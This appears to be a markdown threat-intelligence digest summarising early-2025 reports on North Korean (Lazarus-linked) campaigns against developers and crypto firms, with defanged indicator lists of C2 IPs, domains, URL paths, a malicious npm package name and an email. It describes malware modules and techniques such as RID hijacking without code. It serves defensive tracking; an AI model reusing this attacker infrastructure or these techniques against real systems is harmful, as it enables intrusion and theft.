Date:: 2025-01-15 URL:: https://securityscorecard.com/blog/operation-99-north-koreas-cyber-assault-on-software-developers/?t Tags:: DPRK-IT Details::

targets software developers looking for freelance Web3 and cryptocurrency work. If you thought fake job offers from the group’s Operation DreamJob campaign were bad, this latest move is a masterclass in deception, sophistication, and malicious intent.
The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews. Once a victim takes the bait, they’re directed to clone a malicious GitLab repository—seemingly harmless, but packed with disaster. The cloned code connects to Command-and-Control (C2) servers, embedding malware into the victim’s environment.
The attack features a multi-stage malware system with modular components. These include:
Main99: A downloader that connects to C2 servers, retrieving additional payloads.
Payload99/73: Implants capable of keylogging, clipboard monitoring, and file exfiltration.
MCLIP: A dedicated implant for keyboard and clipboard monitoring.
This modular framework is as flexible as it is dangerous. It works across platforms—Windows, macOS, and Linux—embedding itself into developer workflows with surgical precision. By adapting malware to each target, the Lazarus Group ensures maximum impact with minimum detection.
The C2 servers for Operation 99 are hosted by Stark Industries LLC, deploying heavily obfuscated Python scripts. These scripts compress data using ZLIB and tailor payloads to specific victims Indicators::

Securing Cryptocurrency Organizations

Date:: 2025-01-21 URL:: https://cloud.google.com/blog/topics/threat-intelligence/securing-cryptocurrency-organizations Tags:: Details::

The threats posed to these organizations are significant. Mandiant has observed cryptocurrency organizations employing heightened security controls driven by pressures from widespread reporting of impactful heists, however, many still remain unprepared for the threats they face.
Across its Incident Response engagements conducted at cryptocurrency organizations, Mandiant has observed common challenges relatively unique to these types of organizations. Mandiant has observed that these challenges introduce significant technical security debt, complexity, and widened attack surfaces, which make preventing, detecting, and responding to intrusions increasingly challenging.
Hyperfocus on wallet infrastructure: Many organizations focus on the security of wallet infrastructure but fall short on fundamental enterprise security practices.
Rapid development lifecycles: Cryptocurrency organizations, especially startups, often need to develop platforms fast, driven by aggressive market competition and investor pressure.
Unmanaged workforces: Given the demand for cryptocurrency platform developers, many organizations employ contractors or freelancers, who work for multiple organizations at the same time from their own devices. These devices are generally not monitored or policy-enforced by the organizations the user works for, and compromise of one of these devices may lead to intrusions at multiple organizations.
Unmanaged or disparate infrastructure: Given how rapidly many organizations have grown, infrastructure can be relatively chaotic, with disparate systems across multiple environments or cloud providers, with ad-hoc inventory or change management practices. Indicators::

North Korean IT Workers Conducting Data Extortion

Date:: 2025-01-23 URL:: https://ic3.gov/PSA/2025/PSA250123 Tags:: DPRK-IT Details::

Extortion and Theft of Sensitive Company Data
After being discovered on company networks, North Korean IT workers have extorted victims by holding stolen proprietary data and code hostage until the companies meet ransom demands. In some instances, North Korean IT workers have publicly released victim companies' proprietary code.
North Korean IT workers have copied company code repositories, such as GitHub, to their own user profiles and personal cloud accounts. While not uncommon among software developers, this activity represents a large-scale risk of theft of company code.
North Korean IT workers could attempt to harvest sensitive company credentials and session cookies to initiate work sessions from non-company devices and for further compromise opportunities. Indicators::

US DOJ: Operators of Cryptocurrency Mixers Sinbad and Blender Charged with Money Laundering

Date:: 2025-01-10 URL:: https://www.justice.gov/opa/pr/operators-cryptocurrency-mixers-charged-money-laundering Tags:: Money Laundering Details::

A federal grand jury in the Northern District of Georgia returned an indictment on Jan. 7 charging three Russian nationals for their involvement in operating the cryptocurrency mixing services Blender.io and Sinbad.io. Roman Vitalyevich Ostapenko and Alexander Evgenievich Oleynik were arrested on Dec. 1, 2024, roughly a year after Sinbad.io’s online infrastructure was seized as part of a coordinated law enforcement action among the Netherlands’ Financial Intelligence and Investigative Service, Finland’s National Bureau of Investigation, and the FBI. The third defendant, Anton Vyachlavovich Tarasov, remains at large.
Both Blender.io and Sinbad.io have been sanctioned by the Department of Treasury’s Office of Foreign Assets Control (OFAC). On May 6, 2022, OFAC sanctioned Blender.io, citing its use by the Democratic People’s Republic of Korea (DPRK) to launder stolen virtual currency. OFAC’s public sanctions announcement also explained that Blender.io laundered funds for multiple ransomware groups. On Nov. 29, 2023, OFAC sanctioned Sinbad.io, publicly citing its use by a DPRK state-sponsored hacking group and cybercriminals to obfuscate transactions linked to other criminal offenses.
Ostapenko, 55, is charged with one count of conspiracy to commit money laundering and two counts of operating an unlicensed money transmitting business. Oleynik, 44, and Tarasov, 32, are both charged with one count of conspiracy to commit money laundering and one count of operating an unlicensed money transmitting business. If convicted, the defendants each face a maximum penalty of 20 years in prison for the money laundering conspiracy count and five years in prison for each unlicensed money transmitting business count. A federal district court judge will determine any sentence after considering the U.S. Sentencing Guidelines and other statutory factors. Indicators::

‘JustJoin’ Landing Page Linked to Suspected DPRK Activity Resurfaces

Date:: 2025-01-14 URL:: https://hunt.io/blog/justjoin-landing-page-linked-to-suspected-dprk-activity-resurfaces Tags:: Bluenoroff, TA444 Details::

TA444/BlueNoroff Infrastructure
Our scan results led us to IP address 23.254.167[.]216, hosted on Hostwinds in the United States, with only one service exposed-HTTP on port 80. Examining the server revealed headers consistent with previously observed DPRK-related activity. These included Apache, OpenSSL, and PHP, which, while not uniquely tied to BlueNoroff, provided a solid basis for further investigation.
Figure 2: 'JustJoin' landing page hosted at a0info.v6[.]army Indicators::
23.254.167[.]216
108.174.194[.]44
108.174.194[.]196
taglala[.]com
hamzastrs[.]pro
rr.1u[.]ms
a0info.v6[.]army
cryptorgram[.]com
www.cryptorgram[.]com

North Korean APT Lazarus Targets Developers with Malicious npm Package

Date:: 2025-01-29 URL:: https://socket.dev/blog/north-korean-apt-lazarus-targets-developers-with-malicious-npm-package Tags:: DPRK-CI Details::

Socket researchers have discovered the malicious npm package postcss-optimizer, which contains code linked to previously documented campaigns conducted by North Korean state-sponsored threat actors known as Contagious Interview, a subgroup within the broader Lazarus Advanced Persistent Threat (APT) group. Indicators::
postcss-optimizer
91.92.120[.]132:80/client/xxx
91.92.120[.]132:80/pdown
91.92.120[.]132:80/uploads
npm username: yolorabbit
email used to register npm username: surprise.eng000@gmail.com

Operation Phantom Circuit: North Korea’s Global Data Exfiltration Campaign

Date:: 2025-01-29 URL:: https://securityscorecard.com/wp-content/uploads/2025/01/Operation-Phantom-Circuit-Report_013025_04.pdf Tags:: DPRK-CI, DPRK-IT Details::

Communication with infected systems over port 1224
Administrative platform accessible via port 1245, featuring a hidden React web application and Node.js API.
Remotely organize and manage stolen data globally.
Multiple C2 servers from the IP address 83[.]234[.]227[.]50. This IP connected to the latest C2 server, 94[.]131[.]9[.]32, between January 17 and January 18 via port 1245 and remains active at the time of writing. Additionally, it has historically connected to 185[.]153[.]182[.]241 on ports 1224, 1245, 2248, 2252 (C2-specific ports), and 3389 (RDP) between December 26 and January 16. It also established connections with 5[.]253[.]43[.]122 during the period of December 26 to January 17 over ports 1224, 1245, and 3389. Both servers were used in targeted campaigns linked to this operation.
The adversary accessed 185[.]153[.]182[.]241 via Remote Desktop Protocol (RDP) on several occasions, specifically on December 30, January 6, and January 10, maintaining an RDP session for 10 days. In the context of Operation99, which involved the C2 server 5[.]253[.]43[.]122, the adversary logged in via RDP more than a dozen times between December 26 and January 15.
IP address 83[.]234[.]227[.]50 serves as an intermediate proxy controlled by the Lazarus group, given its connection to multiple distinct C2 servers. Further analysis identified another IP, 83[.]234[.]227[.]49, from the same net-range connecting to a different Lazarus-controlled server (45[.]128[.]52[.]14) over ports 3389, 1224, and 1245 between December 2 and December 10. This C2 was hosted on Stark Industries infrastructure and exhibited activity similar to Operation99, which was linked to attacks publicly reported in November 2024 involving Lazarus’ presence on the Codementor platform.
Going deeper, we uncovered another Lazarus C2 server, 86[.]104[.]74[.]51, which was active throughout most of November 2024. This server, also hosted on Stark Industries infrastructure, resolved to the domain sageskillsuk[.]com in late September 2024, spoofing the legitimate entity skillsage. The C2 server was accessed by the same intermediate proxy exit points hosted in Russia.
STRIKE assesses with high confidence that the IPs used to connect to the C2s were merely a relay/proxy and used to obfuscate the true origin. The adversary was establishing a secondary session after connecting to the VPN with the proxy, thus obscuring the true origin of where they actually connected from. During the Sageskills attack in November 2024, we observed a connection from an Astrill VPN IP address (70.39.70.196) to 83[.]234[.]227[.]53 between November 1 and November 6, 2024. According to Virus Total the Astrill IP address is linked to the DPRK IT Worker scheme, which at first seemed low confidence, but after analysis we can assess with high confidence that it is an exit point used by Lazarus.
In December, the same Astrill IP was also observed connecting to 83[.]234[.]227[.]50, which had been seen communicating to the C2 servers. The latest campaign that we discovered another Astrill VPN IP address was seen connecting to the proxy 83[.]234[.]227[.]53 on 1/23/2025 which in turn connected to the C2 94[.]131[.]9[.]32 on that same day. North Korea has used Astrill VPNs in the past, which have been identified in targeted IT worker schemes.
North Korea appears to be using Astrill VPNs significantly from the North Korean net-range 175.45.176.0/22 which represents their only assigned address space. The following is the analysis of specific IPs involved in routing traffic through proxies in Russia to manage C2 infrastructure.
In December 2024, a North Korean IP address (175.45.178.130) was observed connecting to the Astrill VPN (70.39.70.196), aligning with the timeframe of the campaign's attacks and Indicators::
5[.]253[.]43[.]122
185[.]153[.]182[.]241
83[.]234[.]227[.]50
83[.]234[.]227[.]49
45[.]128[.]52[.]14
86[.]104[.]74[.]51
Astrill VPN 70.39.70.196 to 83[.]234[.]227[.]53
83[.]234[.]227[.]53
94[.]131[.]9[.]32
175.45.176.0/22
175.45.178.130 observed connecting to the Astrill VPN (70.39.70.196)

How a North Korean dev tricked a Solana trading bot team and stole $1.4m

Date:: 2025-01-30 URL:: https://www.dlnews.com/articles/regulation/how-a-dprk-developer-tricked-solareum-and-stole-14m/ Tags:: DPRK-IT Details::

In December, the Solareum team said in the app’s support channel that it was “onboarding a new dev.” After users reported that their wallets had been drained in March, the proceeds were laundered through crypto exchanges, including HTX, Binance, MEXC, EasyBit and FixedFloat, according to prosecutors. Indicators::

North Korean Hackers Exploit RID Hijacking to Gain Full Control Over Windows Systems

Date:: 2025-02-01 URL:: https://www.cysecurity.news/2025/02/north-korean-hackers-exploit-rid.html Tags:: Andariel Details::

A North Korean cybercriminal group, Andariel, has been found using a stealthy hacking technique called RID hijacking to gain full control over Windows systems. This method allows attackers to manipulate a computer’s security settings, turning a low-privilege user account into an administrator account and granting them hidden control over the system. Andariel typically gains initial access by exploiting software vulnerabilities or tricking users into downloading malware. Once inside, they use hacking tools like PsExec and JuicyPotato to obtain SYSTEM-level privileges, the highest level of access on a Windows machine. Indicators::

macOS FlexibleFerret: Further Variants of DPRK Malware Family Unearthed

Date:: 2025-02-03 URL:: https://www.sentinelone.com/blog/macos-flexibleferret-further-variants-of-dprk-malware-family-unearthed/ Tags:: DPRK-CI Details::

Last week Apple pushed a signature update to its on-device malware tool XProtect to block several variants of what it called the macOS Ferret family: FROSTYFERRET_UI, FRIENDLYFERRET_SECD, and MULTI_FROSTYFERRET_CMDCODES. This DPRK-attributed malware family was first described by researchers in December and further in early January and identified as part of the North Korean Contagious Interview campaign, in which threat actors lure targets to install malware through the job interview process. Indicators::
zoom.callservice[.]us
Liseth Alejandra Trujillo Garcia
api.ipify.org

Files

lazarus-malware-and-ttps.md

Latest commit

History